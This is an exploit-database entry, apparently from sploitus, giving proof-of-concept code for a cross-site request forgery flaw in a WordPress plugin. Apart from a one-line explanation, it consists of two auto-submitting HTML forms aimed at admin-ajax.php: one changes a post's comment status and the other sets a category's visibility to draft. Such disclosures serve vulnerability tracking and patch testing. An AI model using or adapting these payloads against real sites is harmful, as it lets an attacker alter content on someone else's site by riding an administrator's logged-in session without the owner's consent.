Share
## https://sploitus.com/exploit?id=WPEX-ID:4A36E876-7E3B-4A81-9F16-9FF5FBB20DD6
The following PoC codes are for post ID 1 (rndval is really just a random value):

<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="ame_ajax_set_commentstatus">
    <input type="text" name="postid" value="1">
    <input type="text" name="comment_status" value="1">
    <input type="text" name="posttype" value="post">
    <input type="text" name="rndval" value="123">
</form>
<script>
    document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="ame_toggle_visibility">
    <input type="text" name="category_id" value="1">
    <input type="text" name="vis_status" value="draft">
    <input type="text" name="posttype" value="post">
    <input type="text" name="rndval" value="123">
</form>
<script>
    document.getElementById("test").submit();
</script>